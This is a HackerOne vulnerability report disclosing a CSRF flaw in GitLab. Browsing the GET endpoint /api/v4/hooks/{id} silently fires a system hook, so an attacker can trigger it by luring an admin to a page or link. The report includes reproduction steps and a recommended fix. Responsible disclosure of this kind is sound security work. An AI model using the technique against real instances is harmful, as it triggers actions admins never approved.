CSRF in System hooks execution through API
HackerOne report #471274 by mishre
on 2018-12-22:
Summary: Gitlab allows admins (of the whole deployment) to configure system hooks, which will be executed upon certain actions (across all projects). However, it seems that there exists an endpoint which sends a test web hook when being browsed by an admin.
Description:
When the admin is logged and an attacker lures him to browse https://gitlab-instance/api/v4/hooks/{hook-id}
the hook is executed with test parameters possibly causing undesired actions to be performed (sending requests which the admin didn't want to send). An attacker can cause a silent execution of the web hook, by luring the admin to browse his own site (while including an image on that site poiting to the mentioned endpoint) or by luring the admin on clicking a link.
Steps To Reproduce:
- Login to Gitlab as the instance admin.
- Browse to https://gitlab-instance/admin/hooks
- Create a hook pointing to a server under your control.
- Now browse to https://gitlab-instance/api/v4/hooks/1 (substitute 1 with the created hook's id)
- To verify this actually executed the hook - check your hook server logs, you should see a request with the following header: X-Gitlab-Event
Impact
An attacker can cause system hooks to be executed undesirably.
Security Team Recommendation
Change the HTTP method to POST to be consistent with the solution in https://gitlab.com/gitlab-org/gitlab-ce/issues/42604.